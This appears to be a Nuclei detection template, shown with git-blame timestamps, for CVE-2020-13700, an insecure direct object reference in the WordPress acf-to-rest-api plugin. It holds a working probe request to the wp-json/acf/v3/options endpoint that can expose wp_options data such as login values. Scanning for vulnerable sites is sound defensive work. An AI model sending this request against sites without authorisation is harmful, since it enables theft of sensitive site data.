2021-03-10 04:14:33 +00:00
id : CVE-2020-13700
info :
2022-07-26 13:45:11 +00:00
name : WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
2021-03-10 04:14:33 +00:00
author : pikpikcu
severity : high
description : |
2022-07-26 13:45:11 +00:00
WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
2022-04-22 10:38:41 +00:00
reference :
- https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
2022-05-17 09:18:12 +00:00
- https://wordpress.org/plugins/acf-to-rest-api/#developers
- https://github.com/airesvsg/acf-to-rest-api
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13700
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-13700
cwe-id : CWE-639
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,wordpress,plugin
2021-03-10 04:14:33 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
matchers-condition : and
matchers :
- type : word
words :
- 'Content-Type : application/json'
part : header
2021-03-10 04:17:25 +00:00
2021-03-10 04:14:33 +00:00
- type : word
words :
- 'acf-to-rest-api\/class-acf-to-rest-api.php'
part : body
condition : and
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/13